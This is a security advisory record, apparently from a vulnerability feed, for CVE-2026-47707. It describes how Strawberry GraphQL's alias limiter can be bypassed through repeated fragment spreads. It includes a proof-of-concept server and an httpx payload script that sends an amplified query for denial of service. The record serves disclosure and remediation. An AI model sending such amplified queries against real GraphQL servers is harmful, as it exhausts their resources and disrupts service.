{"id":"CVE-2026-47707","aliases":["GHSA-fr49-mhgj-crfc","PYSEC-2026-2284"],"title":"Strawberry GraphQL's Bypass of MaxAliasesLimiter via Fragment Spreads leading to GraphQL Alias Amplification","summary":"Strawberry GraphQL's Bypass of MaxAliasesLimiter via Fragment Spreads leading to GraphQL Alias Amplification","severity":"medium","cvss":5.3,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","vendor":"strawberry-graphql","product":"strawberry-graphql","ecosystem":"pip","affected":["strawberry-graphql >= 0.172.0, < 0.315.7"],"patched":["strawberry-graphql 0.315.7"],"published":"2026-06-04","updated":"2026-07-13","source":"OSV","sourceUrl":"https://osv.dev/vulnerability/GHSA-fr49-mhgj-crfc","references":[{"url":"https://github.com/strawberry-graphql/strawberry/security/advisories/GHSA-fr49-mhgj-crfc"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-47707"},{"url":"https://github.com/strawberry-graphql/strawberry"},{"url":"https://github.com/strawberry-graphql/strawberry/releases/tag/0.315.7"}],"tags":["osv","pip"],"epss":0.00466,"epssPercentile":0.3954,"ingestedAt":"2026-07-13T18:57:57.827Z","slug":"CVE-2026-47707","body":"## Overview\n\n### Summary\nThe MaxAliasesLimiter extension in Strawberry fails to account for the multiplicative/amplification effect of FragmentSpreadNode. While it correctly counts static aliases within the AST it does not consider how many times a fragments internal aliases are expanded during execution. this allows an attacker to bypass alias limits and force the server to resolve and render a significantly higher number of aliases than allowed, potentially leading to a  dos via resource exhaustion.\n\n### Details\nThe current implementation of alias counting in strawberry/extensions/max_aliases.py uses a static approach\n```\nfor selection in selection_set_owner.selection_set.selections: \n    if isinstance(selection, FieldNode) and selection.alias:\n        result += 1\n\n    if isinstance(selection, (FieldNode, InlineFragmentNode)) and ~~~:\n        result += count_fields_with_alias(selection)\n```\n\nWhen a FragmentSpread is used multiple times, the actual number of aliases processed by the execution engine is\n\n**Total Aliases = query aliases + (num of spreads * aliases within fragment)**\n\nBecause Strawberry only performs a static sum of the text, it misses this multiplication\n\n### PoC\n**server code**\n```\nimport strawberry\nfrom fastapi import FastAPI\nfrom strawberry.fastapi import GraphQLRouter\nfrom strawberry.extensions import MaxAliasesLimiter\n\n@strawberry.type\nclass User:\n    name: str = \"GONA\"\n\n@strawberry.type\nclass Query:\n    @strawberry.field\n    def user(self) -> User:\n        return User()\n\n# Limit is set to 20 aliases\nschema = strawberry.Schema(\n    query=Query, \n    extensions=[MaxAliasesLimiter(max_alias_count=20)]\n)\n\napp = FastAPI()\napp.include_router(GraphQLRouter(schema), prefix=\"/graphql\")\n```\n\n**payloads**\n```\nimport httpx\n\npayload = {\n    \"query\": \"\"\"\n        fragment Amplification on User {\n            a1: name, a2: name, a3: name, a4: name, a5: name,\n            a6: name, a7: name, a8: name, a9: name, a10: name\n        }\n        query Bypass {\n            u1: user { ...Amplification }\n            u2: user { ...Amplification }\n            u3: user { ...Amplification }\n            u4: user { ...Amplification }\n            u5: user { ...Amplification }\n            u6: user { ...Amplification }\n            u7: user { ...Amplification }\n            u8: user { ...Amplification }\n            u9: user { ...Amplification }\n            u10: user { ...Amplification }\n        }\n    \"\"\"\n}\n\nresponse = httpx.post(\"http://127.0.0.1:8000/graphql\", json=payload)\nprint(f\"Status: {response.status_code}\")\n# The response will contain 100 'a' aliases nested within 10 'u' aliases.\nprint(response.json())\n```\n\n### Impact\nAn attacker can bypass security constraints to cause Application-level DOS. By staying just under the max_alias_count limit in the AST an attacker can trigger thousands of actual alias resolutions on the backend consuming excessive CPU and memory\n\n## Affected packages\n\n- `strawberry-graphql >= 0.172.0, < 0.315.7`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `strawberry-graphql 0.315.7`","depth":"sunlit","depthScore":29,"depthScoreParts":{"impact":29.2,"likelihood":0.1,"exploitation":0,"ransomware":0},"changes":[]}